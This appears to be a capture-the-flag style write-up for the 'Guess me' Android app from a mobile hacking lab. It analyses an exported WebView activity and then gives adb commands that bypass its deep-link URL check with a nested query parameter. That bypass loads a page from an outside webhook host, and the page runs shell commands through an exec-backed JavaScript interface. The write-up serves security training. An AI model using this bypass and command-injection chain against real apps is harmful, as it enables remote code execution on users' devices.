Guess me

📌Initial Analysis and Understanding

Application activities

The application has two exported activities:

the main activity game “which we don’t really care about”
The webview activity which we are going to focus on

<activity
            android:name="com.mobilehackinglab.guessme.WebviewActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data
                    android:scheme="mhl"
                    android:host="mobilehackinglab"/>
            </intent-filter>
        </activity>

Looking ate the intent filter we should notice that it can handle deeplinks because:

it has category BROWSABLE
Data has scheme mhl and host mobilehackinglab

let’s try to launch it

adb shell am start -a android.intent.action.VIEW -d "mhl://mobilehackinglab" -n com.mobilehackinglab.guessme/.WebviewActivity

Activity java code

1- step one understanding java filters

    private final void handleDeepLink(Intent intent) {
        Uri uri = intent != null ? intent.getData() : null;
        if (uri != null) {
            if (isValidDeepLink(uri)) {
                loadDeepLink(uri);
            } else {
                loadAssetIndex();
            }
        }
    }

    private final boolean isValidDeepLink(Uri uri) {
        if ((!Intrinsics.areEqual(uri.getScheme(), "mhl") && !Intrinsics.areEqual(uri.getScheme(), "https")) || !Intrinsics.areEqual(uri.getHost(), "mobilehackinglab")) {
            return false;
        }
        String queryParameter = uri.getQueryParameter("url");
        return queryParameter != null && StringsKt.endsWith$default(queryParameter, "mobilehackinglab.com", false, 2, (Object) null);
    }

first function handleDeepLink validates the deeplink against the filters using isValidDeepLink :

it should have scheme mhl or https
it should have host mobilehackinglab
it should have the url query parameter that will be loaded using webview engine with a value ends with mobilehackinglab.com

if the deeplink fails any filter it will load the webview in the assets folder

web view analysis

it has java script interface enabled which allow the loaded webpage to access some java classes using js code

what is the functions webview can access?

the functions that has @JavascriptInterface annotation

After reviewing the 2 functions you should realize theat the second function getTime takes a string parameter which get executed using exec function

📌Exploitation

1- bypassing deeplink filter

there is a week filter that checks on the host of the url it must have mobilehackinglab.com at the end, but we can put it in a query parameter and load any host let’s try

adb shell am start -a android.intent.action.VIEW -d "https://mobilehackinglab?url=https://facebook.com?url=https://mobilehackinglab.com" -n com.mobilehackinglab.guessme/.WebviewActivity

2- execute commands

use web hook to load our own hosted web page that execute id command using the getTime function

load it

adb shell am start -a android.intent.action.VIEW -d "https://mobilehackinglab?url=https://whc49a9066b4da406221.free.beeceptor.com?x=https://mobilehackinglab.com" -n com.mobilehackinglab.guessme/.WebviewActivity

PreviousMobile hacking lab Nextconfig editor

Last updated 8 months ago

hashtag📌Initial Analysis and Understanding

hashtagApplication activities

hashtagActivity java code

hashtag1- step one understanding java filters

hashtagweb view analysis

hashtag📌Exploitation

hashtag1- bypassing deeplink filter

hashtag2- execute commands